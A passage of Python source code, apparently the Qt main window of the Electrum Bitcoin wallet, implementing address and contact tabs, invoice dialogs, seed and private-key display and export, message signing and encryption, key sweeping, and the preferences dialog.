QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) vbox.setContentsMargins(0, 0, 0, 0) vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) toolbar = l.create_toolbar(self.config) toolbar_shown = self.config.get('show_toolbar_addresses', False) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = l = UTXOList(self) return self.create_list_tab(l) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) return self.create_list_tab(l) def remove_address(self, addr): if self.question(_("Do you want to remove {} from your wallet?").format(addr)): self.wallet.delete_address(addr) self.need_update.set() # history, addresses, coins self.clear_receive_tab() def get_coins(self): if self.pay_from: return self.pay_from else: return self.wallet.get_spendable_coins(None, self.config) def spend_coins(self, coins): self.set_pay_from(coins) self.show_send_tab() self.update_fee() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_invoice(self, key): pr = self.invoices.get(key) if pr is None: self.show_error('Cannot find payment request in wallet.') return pr.verify(self.contacts) self.show_pr_details(pr) def show_pr_details(self, pr): key = pr.get_id() d = WindowModalDialog(self, _("Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0) grid.addWidget(QLabel(pr.get_requestor()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs())) grid.addWidget(QLabel(outputs_str), 1, 1) expires = pr.get_expiration_date() grid.addWidget(QLabel(_("Memo") + ':'), 2, 0) grid.addWidget(QLabel(pr.get_memo()), 2, 1) grid.addWidget(QLabel(_("Signature") + ':'), 3, 0) grid.addWidget(QLabel(pr.get_verify_status()), 3, 1) if expires: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(expires)), 4, 1) vbox.addLayout(grid) def do_export(): name = str(key) + '.bip70' fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70") if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('Invoice saved as' + ' ' + fn)) exportButton = EnterButton(_('Save'), do_export) def do_delete(): if self.question(_('Delete invoice?')): self.invoices.remove(key) self.history_list.update() self.invoice_list.update() d.close() deleteButton = EnterButton(_('Delete'), do_delete) vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d))) d.exec_() def do_pay_invoice(self, key): pr = self.invoices.get(key) self.payment_request = pr self.prepare_for_payment_request() pr.error = None # this forces verify() to re-run if pr.verify(self.contacts): self.payment_request_ok() else: self.payment_request_error() def create_console_tab(self): from .console import Console self.console = console = Console() return console def update_console(self): console = self.console console.history = self.config.get("console-history",[]) console.history_index = len(console.history) console.updateNamespace({ 'wallet': self.wallet, 'network': self.network, 'plugins': self.gui_object.plugins, 'window': self, 'config': self.config, 'electrum': electrum, 'daemon': self.gui_object.daemon, 'util': util, 'bitcoin': bitcoin, }) c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args: f(method, args, self.password_dialog) for m in dir(c): if m[0]=='_' or m in ['network','wallet','config']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) self.balance_label = QLabel("Loading wallet...") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.update_check_button = QPushButton("") self.update_check_button.setFlat(True) self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor)) self.update_check_button.setIcon(read_QIcon("update.png")) self.update_check_button.hide() sb.addPermanentWidget(self.update_check_button) self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog ) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) ) self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog ) sb.addPermanentWidget(self.seed_button) self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self)) sb.addPermanentWidget(self.status_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def update_lock_icon(self): icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.may_have_password()) self.send_button.setVisible(not self.wallet.is_watching_only()) def change_password_dialog(self): from electrum.storage import STO_EV_XPUB_PW if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(str(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): tab = self.tabs.currentWidget() #if hasattr(tab, 'searchable_list'): # tab.searchable_list.toggle_toolbar() #return self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(280) line2 = QLineEdit() line2.setFixedWidth(280) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_master_public_keys(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) mpk_list = self.wallet.get_master_public_keys() vbox = QVBoxLayout() wallet_type = self.wallet.storage.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) vbox.addLayout(grid) if self.wallet.is_deterministic(): mpk_text = ShowQRTextEdit() mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) def show_mpk(index): mpk_text.setText(mpk_list[index]) # only show the combobox in case multiple accounts are available if len(mpk_list) > 1: def label(key): if isinstance(self.wallet, Multisig_Wallet): return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )' return '' labels = [label(i) for i in range(len(mpk_list))] on_click = lambda clayout: show_mpk(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click) vbox.addLayout(labels_clayout.layout()) else: vbox.addWidget(QLabel(_("Master Public Key"))) show_mpk(0) vbox.addWidget(mpk_text) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(dialog))) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(str(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None): if not data: return d = QRDialog(data, parent or self, title) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk, redeem_script = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(str(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) if redeem_script: vbox.addWidget(QLabel(_("Redeem Script") + ':')) rds_e = ShowQRTextEdit(text=redeem_script) rds_e.addCopyButton(self.app) vbox.addWidget(rds_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. Not just in Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, txt): from electrum.transaction import tx_from_str try: tx = tx_from_str(txt) return Transaction(tx) except BaseException as e: self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e)) return def read_tx_from_qrcode(self): from electrum import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except BaseException as e: self.show_error(str(e)) return if not data: return # if the user scanned a bitcoin URI if str(data).startswith("bitcoin:"): self.pay_to_URI(data) return # else if the user scanned an offline signed tx try: data = bh2u(bitcoin.base_decode(data, length=None, base=43)) except BaseException as e: self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e))) return tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self): fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn") if not fileName: return try: with open(fileName, "r") as f: file_content = f.read() except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction")) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + str(e)) return tx = transaction.Transaction(raw_tx) self.show_transaction(tx) @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password)[0] private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(str(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def import_labels(path): def _validate(data): return data # TODO def import_labels_assign(data): for key, value in data.items(): self.wallet.set_label(key, value) import_meta(path, _validate, import_labels_assign) def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), import_labels, on_import) def do_export_labels(self): def export_labels(filename): export_meta(self.wallet.labels, filename) export_meta_gui(self, _('labels'), export_labels) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_('Error')}: {str(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise try: coins, keypairs = sweep_preparations(get_pk(), self.network) except Exception as e: # FIXME too broad... self.show_message(str(e)) return self.do_clear() self.tx_external_keypairs = keypairs self.spend_coins(coins) self.payto_e.setText(addr) self.spend_max() self.payto_e.setFrozen(True) self.amount_e.setFrozen(True) self.warn_if_watching_only() def _do_import(self, title, header_layout, func): text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): self.need_restart = False d = WindowModalDialog(self, _('Preferences')) vbox = QVBoxLayout() tabs = QTabWidget() gui_widgets = [] fee_widgets = [] tx_widgets = [] id_widgets = [] # language lang_help = _('Select which language is used in the GUI (after restart).') lang_label = HelpLabel(_('Language') + ':', lang_help) lang_combo = QComboBox() from electrum.i18n import languages lang_combo.addItems(list(languages.values())) lang_keys = list(languages.keys()) lang_cur_setting = self.config.get("language", '') try: index = lang_keys.index(lang_cur_setting) except ValueError: # not in list index = 0 lang_combo.setCurrentIndex(index) if not self.config.is_modifiable('language'): for w in [lang_combo, lang_label]: w.setEnabled(False) def on_lang(x): lang_request = list(languages.keys())[lang_combo.currentIndex()] if lang_request != self.config.get('language'): self.config.set_key("language", lang_request, True) self.need_restart = True lang_combo.currentIndexChanged.connect(on_lang) gui_widgets.append((lang_label, lang_combo)) nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"') nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help) nz = QSpinBox() nz.setMinimum(0) nz.setMaximum(self.decimal_point) nz.setValue(self.num_zeros) if not self.config.is_modifiable('num_zeros'): for w in [nz, nz_label]: w.setEnabled(False) def on_nz(): value = nz.value() if self.num_zeros != value: self.num_zeros = value self.config.set_key('num_zeros', value, True) self.history_list.update() self.address_list.update() nz.valueChanged.connect(on_nz) gui_widgets.append((nz_label, nz)) msg = '\n'.join([ _('Time based: fee rate is based on average confirmation time estimates'), _('Mempool based: fee rate is targeting a depth in the memory pool') ] ) fee_type_label = HelpLabel(_('Fee estimation') + ':', msg) fee_type_combo = QComboBox() fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')]) fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0) def on_fee_type(x): self.config.set_key('mempool_fees', x==2) self.config.set_key('dynamic_fees', x>0) self.fee_slider.update() fee_type_combo.currentIndexChanged.connect(on_fee_type) fee_widgets.append((fee_type_label, fee_type_combo)) feebox_cb = QCheckBox(_('Edit fees manually')) feebox_cb.setChecked(self.config.get('show_fee', False)) feebox_cb.setToolTip(_("Show fee edit box in send tab.")) def on_feebox(x): self.config.set_key('show_fee', x == Qt.Checked) self.fee_adv_controls.setVisible(bool(x)) feebox_cb.stateChanged.connect(on_feebox) fee_widgets.append((feebox_cb, None)) use_rbf = self.config.get('use_rbf', True) use_rbf_cb = QCheckBox(_('Use Replace-By-Fee')) use_rbf_cb.setChecked(use_rbf) use_rbf_cb.setToolTip( _('If you check this box, your transactions will be marked as non-final,') + '\n' + \ _('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \ _('Note that some merchants do not accept non-final transactions until they are confirmed.')) def on_use_rbf(x): self.config.set_key('use_rbf', bool(x)) batch_rbf_cb.setEnabled(bool(x)) use_rbf_cb.stateChanged.connect(on_use_rbf) fee_widgets.append((use_rbf_cb, None)) batch_rbf_cb = QCheckBox(_('Batch RBF transactions')) batch_rbf_cb.setChecked(self.config.get('batch_rbf', False)) batch_rbf_cb.setEnabled(use_rbf) batch_rbf_cb.setToolTip( _('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \ _('This will save fees.')) def on_batch_rbf(x): self.config.set_key('batch_rbf', bool(x)) batch_rbf_cb.stateChanged.connect(on_batch_rbf) fee_widgets.append((batch_rbf_cb, None)) msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\ + _('The following alias providers are available:') + '\n'\ + '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\ + 'For more information, see https://openalias.org' alias_label = HelpLabel(_('OpenAlias') + ':', msg) alias = self.config.get('alias','') alias_e = QLineEdit(alias) def set_alias_color(): if not self.config.get('alias'): alias_e.setStyleSheet("") return if self.alias_info: alias_addr, alias_name, validated = self.alias_info alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True)) else: alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) def on_alias_edit(): alias_e.setStyleSheet("") alias = str(alias_e.text()) self.config.set_key('alias', alias, True) if alias: self.fetch_alias() set_alias_color() self.alias_received_signal.connect(set_alias_color) alias_e.editingFinished.connect(on_alias_edit) id_widgets.append((alias_label, alias_e)) # SSL certificate msg = ' '.join([ _('SSL certificate used to sign payment requests.'), _('Use setconfig to set ssl_chain and ssl_privkey.'), ]) if self.config.get('ssl_privkey') or self.config.get('ssl_chain'): try: SSL_identity = paymentrequest.check_ssl_config(self.config) SSL_error = None except BaseException as e: SSL_identity = "error" SSL_error = str(e) else: SSL_identity = "" SSL_error = None SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg) SSL_id_e = QLineEdit(SSL_identity) SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '') if SSL_error: SSL_id_e.setToolTip(SSL_error) SSL_id_e.setReadOnly(True) id_widgets.append((SSL_id_label, SSL_id_e)) units = base_units_list msg = (_('Base unit of your wallet.') + '\n1 BTC = 1000 mBTC. 1 mBTC = 1000 bits. 1 bit = 100 sat.\n' + _('This setting affects the Send tab, and all balance related fields.')) unit_label = HelpLabel(_('Base unit') + ':', msg) unit_combo = QComboBox() unit_combo.addItems(units) unit_combo.setCurrentIndex(units.index(self.base_unit())) def on_unit(x, nz): unit_result = units[unit_combo.currentIndex()] if self.base_unit() == unit_result: return edits = self.amount_e, self.fee_e, self.receive_amount_e amounts = [edit.get_amount() for edit in edits] self.decimal_point = base_unit_name_to_decimal_point(unit_result) self.config.set_key('decimal_point', self.decimal_point, True) nz.setMaximum(self.decimal_point) self.history_list.update() self.request_list.update() self.address_list.update() for edit, amount in zip(edits, amounts): edit.setAmount(amount) self.update_status() unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz)) gui_widgets.append((unit_label, unit_combo)) block_explorers = sorted(util.block_explorer_info().keys()) msg = _('Choose which online block explorer to use for functions that open a web browser') block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg) block_ex_combo = QComboBox() block_ex_combo.addItems(block_explorers) block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config))) def on_be(x): be_result = block_explorers[block_ex_combo.currentIndex()] self.config.set_key('block_explorer', be_result, True) block_ex_combo.currentIndexChanged.connect(on_be) gui_widgets.append((block_ex_label, block_ex_combo)) from electrum import qrscanner system_cameras = qrscanner._find_system_cameras() qr_combo = QComboBox() qr_combo.addItem("Default","default") for camera, device in system_cameras.items(): qr_combo.addItem(camera, device) #combo.addItem("Manually specify a device", config.get("video_device")) index = qr_combo.findData(self.config.get("video_device")) qr_combo.setCurrentIndex(index) msg = _("Install the zbar package to enable this.") qr_label = 